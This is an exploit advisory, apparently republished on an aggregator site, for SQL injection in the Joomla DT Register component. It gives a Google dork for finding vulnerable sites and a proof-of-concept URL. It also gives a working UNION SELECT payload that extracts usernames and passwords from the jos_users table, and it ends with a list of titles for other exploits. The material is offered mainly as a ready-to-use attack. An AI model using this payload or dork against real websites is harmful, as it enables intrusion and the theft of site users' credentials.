/---------------------------------------------------------------
/
/ Joomla Component DT Register Remote SQL injection
/
---------------------------------------------------------------/
[*] Author : His0k4 [ALGERIAN HaCkeR]
[*] Dork : inurl:com_DTRegister eventId
[*] Vendor : http://www.dthdevelopment.com/components/dt-register.html
[*] POC : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId={SQL}
[*] Example : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId=-12 UNION SELECT concat(username,0x3a,password) FROM jos_users&task=pay_options&Itemid=138
[*] Greetings : All friends & muslims HaCkeRs
www.dz-secure.com
----------------------------------------------------------------------------
【Joomla Component DT Register Remote SQL injection Vulnerability】相关文章:
★ Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability
★ Joomla Component EZ Store Remote Blind SQL Injection Exploit
★ Maian Cart 1.1 Insecure Cookie Handling Vulnerability
★ WarFTP 1.65 (USER) Remote Buffer Overlow Exploit
★ Maian Gallery 2.0 Insecure Cookie Handling Vulnerability
★ Joomla Component n-forms 1.01 Blind SQL Injection Exploit
★ pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit
★ minb 0.1.0 Remote Code Execution Exploit
★ Sagem Routers F@ST Remote CSRF Exploit (dhcp hostname attack)
★ BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability